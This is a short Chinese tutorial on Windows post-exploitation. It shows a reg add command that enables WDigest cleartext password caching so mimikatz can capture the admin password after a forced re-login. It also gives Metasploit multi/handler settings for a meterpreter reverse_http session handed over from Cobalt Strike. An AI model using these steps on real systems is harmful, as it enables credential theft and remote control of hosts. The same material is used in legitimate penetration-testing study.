mimikatz抓取windows明文密码和cs与msf权限传递

目录

一、mimikatz抓取windows明文密码

二、cs与msf权限传递

cs->msf


一、mimikatz抓取windows明文密码

我这里用的是window2016测试

假设我已经获取到了一台windows的权限

抓取明文:手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录

在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。

mimikatz抓取windows明文密码和cs与msf权限传递

我们可以通过修改注册表的来保存明文:


reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

如果需要恢复原样,只需要将上图REG_DWORD的值1改为0就行。

mimikatz抓取windows明文密码和cs与msf权限传递

修改注册表之后,需注销用户,重新登录才能生效,才能抓取到明文

这里注销就需要进行强制锁屏,因为是远程,锁屏需要借助脚本来进行,我这里就直接用电脑锁屏演示一下能否抓取明文

mimikatz抓取windows明文密码和cs与msf权限传递

由此可以看见抓取成功

二、cs与msf权限传递

cs->msf

创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行新建会话选择监听器

mimikatz抓取windows明文密码和cs与msf权限传递

 msf进去选择监听模块:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http(这个payload要跟设置的payload保持一致)
set lhost 0.0.0.0(不设置也行)
set lport 4444
exploit

mimikatz抓取windows明文密码和cs与msf权限传递

如上图,选择新建会话

mimikatz抓取windows明文密码和cs与msf权限传递

选择刚才新添加的监听器,这时候去msf可以看见已经上线

mimikatz抓取windows明文密码和cs与msf权限传递

© 版权声明

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
none
暂无评论...